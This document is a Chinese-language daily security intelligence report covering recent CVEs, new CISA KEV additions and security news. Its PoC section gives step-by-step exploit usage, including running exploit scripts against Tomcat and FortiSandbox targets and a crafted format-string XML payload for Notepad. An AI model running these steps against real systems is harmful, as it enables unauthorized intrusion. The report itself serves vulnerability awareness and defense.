每日安全情报报告 · 2026-04-28报告时间2026-04-28 09:03 CST覆盖周期近 48 小时2026-04-26 ~ 2026-04-28风险评级说明 严重(CVSS ≥ 9.0) | 高危(CVSS 7.0–8.9) | 中危(CVSS 4.0–6.9)重点标注⚡ 在野利用 | CISA KEV | PoC 已公开一、最新高危漏洞1. CVE-2026-41409 — Apache MINA 反序列化 RCECVE-2024-52046 修复不完整字段详情CVE 编号CVE-2026-41409CVSS 评分9.8严重漏洞类型不可信数据反序列化CWE-502受影响组件Apache MINA 2.0.0 ~ 2.0.27 / 2.1.0 ~ 2.1.10 / 2.2.0 ~ 2.2.5利用状态 CISA KEV 已收录修复版本Apache MINA 2.0.28 / 2.1.11 / 2.2.6漏洞摘要Apache MINA 的AbstractIoBuffer.getObject()方法中CVE-2024-52046 的修复方案存在严重缺陷——反序列化类名白名单的检查时机过晚在白名单生效之前恶意类的静态初始化块已被执行可被利用构造完整的反序列化攻击链。攻击者无需认证、无需用户交互通过网络发送精心构造的序列化数据即可实现 RCE。修复建议立即升级至对应修复版本。若无法立即升级检查是否调用了IoBuffer.getObject()方法并限制网络访问。 NVD 详情 | GitHub Advisory | Apache 官方公告 | TheHackerWire 详情2. CVE-2026-3008 — Notepad 格式化字符串注入字段详情CVE 编号CVE-2026-3008CVSS 评分6.6中危/ ACN 评估为 10.0漏洞类型格式化字符串注入CWE-134受影响组件Notepad 8.9.4利用状态 PoC 已公开2026-04-20修复版本Notepad 8.9.4漏洞摘要Notepad 的FindInFiles功能在解析nativeLang.xml配置文件时对find-result-hits字段中的格式说明符%s、%x等处理不当可导致内存地址泄露绕过 ASLR和应用程序崩溃DoS。攻击者可通过钓鱼邮件分发恶意nativeLang.xml文件进行攻击。意大利 CSIRT-ITAACN已发布高级别安全预警。修复建议立即升级至 Notepad 8.9.4企业可通过 Sysmon 监控异常进程行为。 NVD 详情 | 漏洞详情页 | ACN 安全预警3. CVE-2024-7399 — Samsung MagicINFO 9 路径遍历任意文件写入字段详情CVE 编号CVE-2024-7399CVSS 评分9.8严重漏洞类型路径遍历CWE-22受影响组件Samsung MagicINFO 9 Server 21.1050利用状态⚡ 在野利用 CISA KEV2026-04-24 新增修复截止2026-05-08联邦机构强制漏洞摘要Samsung MagicINFO 9 Server 存在路径遍历漏洞允许远程攻击者写入任意文件。CISA 已确认该漏洞正在被积极利用并将其加入 KEV 目录。该漏洞影响数字标牌基础设施攻击面广泛。修复建议立即升级至 MagicINFO 9 Server 21.1050 及以上版本。 NVD 详情 | CISA KEV 目录4. CVE-2024-57726 — SimpleHelp 低权限 API 密钥权限提升字段详情CVE 编号CVE-2024-57726CVSS 评分9.9严重漏洞类型缺失授权CWE-862受影响组件SimpleHelp Remote Support ≤ 5.5.7利用状态⚡ 在野利用 CISA KEV2026-04-24 新增修复截止2026-05-08联邦机构强制漏洞摘要SimpleHelp 远程支持软件的 API 密钥权限控制存在严重缺陷低权限用户可获取提升的访问权限可组合 CVE-2024-57728路径遍历文件上传实现完整 RCE。修复建议立即升级至 SimpleHelp 5.5.8 或更高版本。 NVD 详情 | CISA KEV 目录5. CVE-2025-29635 — D-Link DIR-823X 命令注入字段详情CVE 编号CVE-2025-29635CVSS 评分高危漏洞类型OS 命令注入CWE-78受影响组件D-Link DIR-823X 路由器利用状态⚡ 在野利用 CISA KEV2026-04-24 新增修复截止2026-05-08联邦机构强制漏洞摘要D-Link DIR-823X 路由器存在命令注入漏洞CISA 已确认在野利用。D-Link 部分产品已 EOL可能无补丁可用。修复建议如无补丁可用考虑替换设备限制路由器管理界面对外暴露。 NVD 详情 | CISA KEV 目录6. CVE-2026-34486 — Apache Tomcat 集群加密绕过 RCE字段详情CVE 编号CVE-2026-34486CVSS 评分7.5高危漏洞类型加密校验绕过 → 反序列化 RCECWE-502受影响组件Apache Tomcat 11.0.20 / 10.1.53 / 9.0.116利用状态 PoC 已公开GitHub漏洞摘要Apache Tomcat 在修复 CVE-2026-29146 时引入了回归漏洞——当 Tribes 集群启用EncryptInterceptor时异常处理逻辑错误导致未成功解密的集群消息仍进入后续处理流程攻击者可向集群端口默认 4000发送特制报文绕过加密校验并触发反序列化 RCE。该漏洞无需认证。修复建议升级至 Apache Tomcat 最新版本临时措施可限制集群通信端口的网络访问。 NVD 详情 | 阿里云漏洞库 | 腾讯云漏洞分析7. CVE-2026-33626 — LMDeploy SSRFAI 推理基础设施字段详情CVE 编号CVE-2026-33626CVSS 评分7.5高危漏洞类型服务端请求伪造CWE-918受影响组件LMDeployLLM 推理引擎利用状态⚡ 披露后 13 小时内即遭在野利用漏洞摘要LMDeploy 的视觉 LLM 端点存在 SSRF 漏洞攻击者可利用其进行内部网络扫描、访问云元数据服务如 AWS IMDSv2。该漏洞披露后极短时间内即遭利用凸显 AI 推理基础设施的安全脆弱性。修复建议立即应用 GitHub 安全公告 GHSA-6w67-hwm5-92mq 中的修复补丁。 GitHub Advisory | Sysdig 分析8. CVE-2025-59528 — Flowise AI RCECVSS 10.0字段详情CVE 编号CVE-2025-59528CVSS 评分10.0严重漏洞类型远程代码执行受影响组件Flowise AI 平台 CustomMCP 节点利用状态大规模利用中漏洞摘要Flowise AI 平台的 CustomMCP 节点在解析用户配置时存在 RCE 漏洞全球约 12,000 暴露实例受影响。该漏洞可被直接利用获取服务器完全控制权。修复建议立即升级至 Flowise 最新版本限制 Flowise 实例的网络暴露。 VulnCheck 公告 | CyberSecurityNews 报道二、CISA KEV 新增动态CISA 4 月 24 日新增 4 个 KEV 漏洞CVE 编号产品CVSS联邦修复截止CVE-2024-7399Samsung MagicINFO 9 Server9.82026-05-08CVE-2024-57726SimpleHelp Remote Support ≤ 5.5.79.92026-05-08CVE-2024-57728SimpleHelp Remote Support ≤ 5.5.77.22026-05-08CVE-2025-29635D-Link DIR-823X高危2026-05-08 CISA KEV 官方目录 | Aviatrix 分析报告持续活跃 KEV 漏洞截止 4 月 28 日仍在利用中CVE-2026-32201— Microsoft SharePoint 欺骗零日⚡ 在野利用今日为联邦修复截止日CVE-2026-33825— Microsoft Defender BlueHammer 提权⚡ 在野利用PoC 已公开CVE-2026-39808— FortiSandbox 未授权命令注入 RCE⚡ 在野利用PoC 已公开CVE-2026-35616— FortiClient EMS 预认证 RCE⚡ 在野利用CVE-2026-34197— Apache ActiveMQ Jolokia RCE⚡ 在野利用CVE-2023-27351— PaperCut NG/MF 未认证 RCE⚡ 大规模利用CVE-2024-27199— JetBrains TeamCity 路径遍历⚡ 在野利用CVE-2026-20122/20128/20133— Cisco SD-WAN Manager⚡ 在野利用截止 5 月 4 日 CISA KEV 目录三、漏洞 PoC1. Apache Tomcat CVE-2026-34486 — 集群加密绕过 RCEPoC 来源GitHub AirSkye 仓库使用步骤# 1. 克隆 PoC 仓库 git clone https://github.com/AirSkye/CVE-2026-34486-poc.git cd CVE-2026-34486-poc # 2. 查看利用说明 cat README.md # 3. 确认目标 Tomcat 集群端口默认 4000 # 4. 根据目标版本选择对应 payload # 5. 执行利用需根据 README 中的具体参数配置目标地址 python3 exploit.py --target TARGET_IP:4000 --cmd id注意事项目标需启用 Tribes 集群并配置 EncryptInterceptor。本 PoC 仅限授权安全测试使用。 GitHub - AirSkye/CVE-2026-34486-poc | 腾讯云漏洞分析2. SGLang CVE-2026-5760 — SSTI → RCE恶意 GGUF 模型触发PoC 来源GitHub Stuub 仓库使用步骤# 1. 克隆 PoC 仓库 git clone https://github.com/Stuub/SGLang-0.5.9-RCE.git cd SGLang-0.5.9-RCE # 2. 查看利用详情 cat README.md # 3. 准备恶意 GGUF 模型文件包含 Jinja2 SSTI payload # 4. 在目标 SGLang 实例上加载恶意模型 # 5. 触发聊天模板渲染执行任意命令注意事项影响 SGLang ≤ 0.5.9。恶意 GGUF 模型通过 Jinja2 聊天模板的 SSTI 实现无沙箱 RCE。仅限授权测试。 GitHub - Stuub/SGLang-0.5.9-RCE3. Notepad CVE-2026-3008 — 格式化字符串注入 PoCPoC 来源意大利 CSIRT-ITAACN安全预警 / 安全研究员公开使用步骤# 1. 创建恶意 nativeLang.xml 文件 cat nativeLang.xml EOF NotepadPlus NativeLang FindInFiles find-result-hits valueAAAA%x%x%x%x%x/ /FindInFiles /NativeLang /NotepadPlus EOF # 2. 替换 Notepad 安装目录下的 nativeLang.xml # 默认路径C:\Program Files\Notepad\nativeLang.xml # 或用户配置目录%APPDATA%\Notepad\nativeLang.xml # 3. 启动 Notepad 并执行 搜索 → 在文件中查找CtrlShiftF # 4. 应用程序将泄露栈内存地址可绕过 ASLR注意事项仅影响 Notepad 8.9.4。攻击向量包括钓鱼邮件分发恶意 XML 文件。已在隔离虚拟机中验证。仅限安全研究使用。 ACN 安全预警 AL01/260427/CSIRT-ITA | Undercode Testing 分析4. FortiSandbox CVE-2026-39808 — 未授权命令注入 RCEPoC 来源GitHub samu-delucas 仓库持续活跃在野利用使用步骤# 1. 克隆 PoC 仓库 git clone https://github.com/samu-delucas/CVE-2026-39808.git cd CVE-2026-39808 # 2. 查看利用说明 cat README.md # 3. 设置目标 FortiSandbox 地址 export TARGEThttps://TARGET_IP # 4. 执行利用以 root 权限执行任意 OS 命令 python3 exploit.py --target $TARGET --cmd id注意事项影响 FortiSandbox 4.4.0 ~ 4.4.8。无需认证以 root 权限执行。修复版本4.4.9。CISA KEV 已收录。仅限授权渗透测试。 GitHub PoCsamu-delucas | Fortinet 公告5. Microsoft Defender CVE-2026-33825 — BlueHammer 本地提权PoC 来源独立安全研究员「Chaotic Eclipse」使用步骤# 1. 获取 PoC需搜索研究员公开的 GitHub/GitLab 仓库 # 搜索关键词BlueHammer CVE-2026-33825 PoC # 2. 在受影响 Windows 系统上需本地访问权限 # 3. 编译利用代码 cl.exe /Fe:exploit.exe exploit.cpp # 4. 执行提权 exploit.exe # 利用 Windows Defender 的 TOCTOU 竞争条件 # 将普通用户权限提升至 SYSTEM注意事项影响 Windows 10/11 Microsoft Defender。CVSS 7.8。已入 CISA KEV在野积极利用。微软已于 4 月 Patch Tuesday 部分修复。仅限授权安全研究。 CyberPress 报道 | SOCRadar 分析四、网络安全最新文章1. Checkmarx 确认 GitHub 仓库数据被发布至暗网来源The Hacker News2026-04-27摘要安全代码分析平台 Checkmarx 披露3 月 23 日供应链安全事件的后续调查显示网络犯罪团伙据报为 Lapsus$ 组织已将 Checkmarx GitHub 仓库相关数据发布至暗网。Checkmarx 强调受影响仓库与客户生产环境隔离未存储客户数据调查仍在进行中。The Register 追加报道指出Lapsus$ 在其泄露站点上声称获取了大量敏感信息。 阅读原文The Hacker News | Checkmarx 官方声明 | The Register 追踪报道2. 73 个虚假 VS Code 扩展传递 GlassWorm v2 恶意软件来源The Hacker News2026-04-27摘要安全公司 Socket 在 Open VSX 仓库中发现 73 个克隆自合法软件的虚假 VS Code 扩展与 GlassWorm v2 持久化信息窃取活动关联。这是自 2025 年 10 月以来 GlassWorm 的第四波攻击。其中 6 个确认为恶意其余 67 个为休眠包——先建立信任再通过更新推送恶意载荷。恶意扩展可跨 IDE 安装恶意软件并窃取凭证主要针对 AI 开发者工具链。 阅读原文The Hacker News | Socket 研究报告 | CSA 研究笔记3. PhantomCore 利用 TrueConf 漏洞入侵俄罗斯网络来源The Hacker News2026-04-27摘要Positive Technologies 报告显示亲乌克兰黑客组织 PhantomCore 自 2025 年 9 月以来持续利用 TrueConf 视频会议软件的三个漏洞CVE-2025-42732、CVE-2025-42733、CVE-2025-42734组成的攻击链对俄罗斯境内服务器实施远程代码执行攻击实现远程访问和横向移动。该漏洞链已于 2026 年 3 月 31 日被 Check Point Research 公开披露并被 CISA KEV 收录。 阅读原文The Hacker News | CSA 复现研究 | Delimiter 详细分析4. Claude Mythos 改变漏洞发现规则——修复速度成生存关键来源The Hacker News2026-04-27摘要Anthropic 发布 Claude Mythos 预览版引发安全圈广泛讨论。文章指出AI 大规模发现漏洞能力固然令人震惊但更隐蔽的运营问题是发现到修复的差距——大多数组织能否快速验证、优先排序和修复 AI 发现的大量漏洞将成为安全运营的生死线。此前 Foresiet 报告已显示 AI 驱动攻击同比增长 89%。 阅读原文The Hacker News5. At-Bay 2026 报告单个勒索团伙推动近半数网络安全保险理赔来源Insurance Business / At-Bay2026-04-27摘要At-Bay 发布 2026 InsurSec 报告揭示 VPN 驱动勒索攻击进入新阶段——单个勒索软件团伙利用单一防火墙品牌漏洞已推动近 50% 的网络安全保险理赔。2025 年 VPN 相关攻击占勒索软件入侵的 73%SonicWall SSL-VPN 成为首选目标。Akira 勒索软件是主要受益者此前 CISA 已发出 SonicWall 大规模暴力破解预警。 阅读原文Insurance Business | At-Bay 官方报告6. CTM360 揭露 GovTrap 活动11,000 虚假政府门户网站来源The Hacker News2026-04-27摘要CTM360 曝光名为GovTrap的全球性活动攻击者构建超过 11,000 个假冒政府门户网站针对全球公民实施钓鱼诈骗。虚假网站模仿各国政府机构界面旨在窃取公民个人信息和凭证。 阅读原文The Hacker News7. FAST16比 Stuxnet 早 5 年的 Lua 恶意软件框架曝光来源The Hacker News2026-04-27摘要安全研究发现名为FAST16的 Lua 恶意软件框架最早可追溯至 2005 年——比臭名昭著的 Stuxnet 蠕虫早了整整 5 年。FAST16 主要用于针对高精度工程和物理仿真软件的数据篡改被认为代表了国家级行动者进行科学 sabotage的最早案例之一。HACKMAGEDDON 的 4 月上旬攻击时间线也对此进行了收录。 阅读原文The Hacker News | HACKMAGEDDON 4 月攻击时间线8. 虚假 CAPTCHA 驱动全球 IRSF 电信欺诈来源The Hacker News2026-04-27摘要Infoblox 披露自 2020 年 6 月持续活跃的电信欺诈活动攻击者利用虚假 CAPTCHA 验证手段诱骗用户发送国际短信产生高额移动账单国际收入共享欺诈 IRSF。与 Keitaro 流量分发平台的 120 活动关联受害者单次可能被扣发往 50 目的地的短信费用。 阅读原文The Hacker News五、风险趋势总结本周安全态势关键词AI 攻击链加速、供应链持续受击、防火墙漏洞成勒索入口AI 安全双刃剑Claude Mythos 压缩漏洞发现时间至小时级同时 AI 基础设施LMDeploy、Flowise自身安全脆弱供应链攻击升级GlassWorm v2 第四波73 个 VS Code 扩展、Lapsus$ 入侵 Checkmarx、持续蔓延的 npm/PyPI 恶意包VPN/防火墙成勒索首选入口At-Bay 报告显示 SonicWall SSL-VPN 相关攻击占勒索软件入侵的 73%CISA KEV 持续扩充4 月 24 日新增 4 个在野利用漏洞Samsung、SimpleHelp、D-Link5 月 8 日前需完成修复Microsoft SharePoint 零日CVE-2026-32201联邦修复截止日即为今日4 月 28 日未修复系统风险极高免责声明本报告仅供安全研究和信息参考之用。所有 PoC 和漏洞利用信息仅限在授权环境中进行安全测试。未经授权对他人系统进行渗透测试属于违法行为。数据来源NVD、CISA KEV、GitHub Advisory、The Hacker News、FreeBuf、安全客、厂商安全公告、Socket、Sysdig、CSA、At-Bay、Positive Technologies、Check Point Research 等。